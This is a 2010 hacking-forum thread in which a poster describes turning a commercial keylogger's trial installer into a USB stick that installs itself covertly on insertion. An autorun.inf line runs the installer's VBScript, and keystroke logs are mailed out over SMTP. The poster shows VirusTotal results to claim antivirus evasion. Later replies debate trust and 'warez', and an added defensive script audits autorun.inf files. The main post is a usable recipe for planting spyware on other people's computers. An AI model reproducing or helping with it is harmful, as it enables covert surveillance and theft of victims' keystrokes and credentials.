lamer Posted June 11, 2010 (edited)

IMPORTANT NOTE: This project is for educational purposes only!!! The software used here is a completely legal 30-day trial from the original source. Because I'm relatively new in this forum and I have very few posts, some people may not trust this project (and if someone uses this, it should be at their own risk; I recommend testing this in a virtual machine before a real one. I will not assume any responsibility for the wrong uses of this program or any activity related to it.) You have been warned!!!

Hi, I know that this project is dead and old, but it is one of my favorites, and I was wondering if it is possible to add this keylogger that is undetectable to most AV because it is legal software. I have been using this keylogger without any payload, but I discovered that there is an option to install this to other machines by making a script with the configuration needed (your account mail, invisibility, etc.), and it looks very similar to the scripts of the leapos-gonzor payloads, so it would be great to add this keylogger, because other keyloggers are knocked out by most AV or do not work at all, and also this keylogger has the option to send data to your mail via SMTP.

The idea is to make it compatible with the payloads mentioned or even a stand-alone installer keylogger from a USB. (Installation is supposed to be invisible.) Note that you have to configure your mail to work with SMTP (I use Gmail).

NEW!! After a couple of probes I got it to work as a stand-alone keylogger with a simple autorun.inf, using a U3 USB key, with very good results, and here is how. I don't pretend to make a step-by-step manual, because you can find the process of customizing a U3 all along the forum, so I'll mark the main points only.

Here are the links to the keylogger, working and tested, FROM THE ORIGINAL LEGAL PAGE. I changed the link because it was causing trouble over legal subjects and this isn't the main priority of this post:

https://www.refog.com/download.html
http://www.refog.com/

You also need a U3 USB key and Universal Customizer. I'll upload it later, but I'm sure you can find it on the forum.

So here we go: First you have to install the software on a computer. I don't like this program on my own computer, so I used a virtual machine for this purpose. Once it is installed and with your full configuration, click file/create installer.../ and choose the folder to make the installer scripts. Now is the time to make it work from a USB key, so you have to make an autorun.inf archive in the same folder as the installer with the following simple code:

    [AutoRun]
    open=wscript logstart.vbs
    icon=YOUROWNPERSONALICON.ICO

and insert the icon you want for your USB in the same folder, so you will have 6 archives:

-MpkNetInstall.exe
-settings.bin
-key.bin
-logstart.vbs
-loguninstal.vbs (I delete this because it seems pointless to me)
-autorun.inf (with the code from above)
-youricon.ico

Now you only have to make an ISO image with the program Universal Customizer, launch it and voila!!! You have an undetectable-invisible-mail sender-only1insert-usb keylogger!!!!
I tested it in Windows XP, completely invisible, and in Windows 7 you just need to click on the icon to launch it (also virtual machines; Windows Vista still dunno), with very scary good results. The only problem I have found so far is that in another virtual machine (XP SP2) it shows a noisy, non-invisible installation error, and it seems to loop on every reboot; I will find out why with more tests. The second problem I suppose will happen is that, because we use a 30-day trial demo, it will stop working in 30 days (for me 30 days of continuous logs for each computer is enough), but I really don't know what will happen, so we have to wait or get a legal registration :)

Again and again: use it at YOUR VERY OWN RISK. You don't have to trust me, but if you do, please submit your results to improve this project. I know I'm still a "newbie", but I prefer to start with something interesting than post 1000000 useless comments (no offense to anyone, and I hope everyone understands me). Enjoy!!

Meanwhile, here is an analysis of it via virustotal.com:

File mipko_employee_setup_604.exe received on 2010.05.10 13:10:35 (UTC)
Current status: finished
Result: 1/41 (2.44%)

Antivirus  Version  Last Update  Result
a-squared  4.5.0.50  2010.05.10  -
AhnLab-V3  2010.05.09.00  2010.05.08  -
AntiVir  8.2.1.236  2010.05.10  -
Antiy-AVL  2.0.3.7  2010.05.10  -
Authentium  5.2.0.5  2010.05.10  -
Avast  4.8.1351.0  2010.05.10  -
Avast5  5.0.332.0  2010.05.10  -
AVG  9.0.0.787  2010.05.10  -
BitDefender  7.2  2010.05.10  -
CAT-QuickHeal  10.00  2010.05.10  -
ClamAV  0.96.0.3-git  2010.05.10  -
Comodo  4813  2010.05.10  -
DrWeb  5.0.2.03300  2010.05.10  -
eSafe  7.0.17.0  2010.05.10  -
eTrust-Vet  35.2.7477  2010.05.10  -
F-Prot  4.5.1.85  2010.05.10  -
F-Secure  9.0.15370.0  2010.05.10  -
Fortinet  4.1.133.0  2010.05.10  -
GData  21  2010.05.10  -
Ikarus  T3.1.1.84.0  2010.05.10  -
Jiangmin  13.0.900  2010.05.10  -
Kaspersky  7.0.0.125  2010.05.10  -
McAfee  5.400.0.1158  2010.05.09  -
McAfee-GW-Edition  2010.1  2010.05.10  -
Microsoft  1.5703  2010.05.10  -
NOD32  5101  2010.05.10  -
Norman  6.04.12  2010.05.10  -
nProtect  2010-05-10.01  2010.05.10  -
Panda  10.0.2.7  2010.05.09  -
PCTools  7.0.3.5  2010.05.10  -
Prevx  3.0  2010.05.10  -
Rising  22.47.00.04  2010.05.10  -
Sophos  4.53.0  2010.05.10  -
Sunbelt  6284  2010.05.10  -
Symantec  20091.2.0.41  2010.05.10  WS.Reputation.1
TheHacker  6.5.2.0.277  2010.05.10  -
TrendMicro  9.120.0.1004  2010.05.10  -
TrendMicro-HouseCall  9.120.0.1004  2010.05.10  -
VBA32  3.12.12.4  2010.05.06  -
ViRobot  2010.5.10.2308  2010.05.10  -
VirusBuster  5.0.27.0  2010.05.10  -

Additional information
File size: 7220632 bytes
MD5 : 498b79b5ad1106b0401f90440b690f15
SHA1 : 8b3f4351987c6566e65b7370faa0a2cc2395815e
SHA256: baa07e0d67efa4e8123329d270c8a9f3b8423ddd0a771e3a4611d06901c7d02e
PEInfo: PE Structure information

Please feel free to post your results.

Edited June 13, 2010 by lamer
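Added example, not part of the original post: a defender-side check that reads the text of an autorun.inf found on removable media and reports every command it would auto-execute, flagging script hosts such as the `open=wscript logstart.vbs` line quoted above. The function name, the script-host list and the benign sample are assumptions made for this illustration.

```python
import re

# Interpreters whose presence in an AutoRun command means the media starts
# script code on insertion (illustrative list, an assumption of this example).
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "cmd", "powershell", "rundll32"}
# [AutoRun] keys that name a command to execute.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|hta)\b", re.I)


def audit_autorun(text):
    """Return (key, command, reason) for each auto-executed command."""
    findings = []
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # blank line or comment
            continue
        if line.startswith("["):                  # section header
            in_autorun = line.lower() == "[autorun]"
            continue
        if not in_autorun or "=" not in line:
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        tokens = command.replace('"', " ").split()
        if not EXEC_KEY.match(key) or not tokens:
            continue
        # Reduce the first token to a bare program name: drop path and .exe.
        program = re.split(r"[\\/]", tokens[0])[-1].lower()
        if program.endswith(".exe"):
            program = program[:-4]
        if program in SCRIPT_HOSTS:
            reason = "script host: " + program
        elif SCRIPT_EXT.search(command):
            reason = "script file"
        else:
            reason = "auto-executed program"
        findings.append((key.lower(), command, reason))
    return findings


# The autorun.inf quoted in the post, and a constructed benign file.
SAMPLE_FROM_POST = "[AutoRun]\nopen=wscript logstart.vbs\nicon=YOUROWNPERSONALICON.ICO\n"
SAMPLE_BENIGN = "; constructed sample\n[AutoRun]\nicon=drive.ico\nlabel=Backup\n"

if __name__ == "__main__":
    for finding in audit_autorun(SAMPLE_FROM_POST):
        print(finding)
```

Setting the `NoDriveTypeAutoRun` policy value to 0xFF disables AutoRun for every drive type, which removes the launch path this check looks for.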
Jen Posted June 12, 2010

Anyone who tests this, be careful. A poster with 2 votes posting something that's dangerous. Anyone who uses this should either run it in a VMware box or a sandbox, just in case.

Jen Posted June 12, 2010

Isn't this warez? Supposedly this is for education purposes, so it shouldn't count as "warez".

sablefoxx Posted June 13, 2010

Warez is generally used to describe cracked copyrighted software; since this is not a crack, nor copyrighted (by someone other than the poster), it isn't 'warez'. http://en.wikipedia.org/wiki/Warez

brl1214 Posted February 18, 2012

Not to mention good chance it's just a botnet.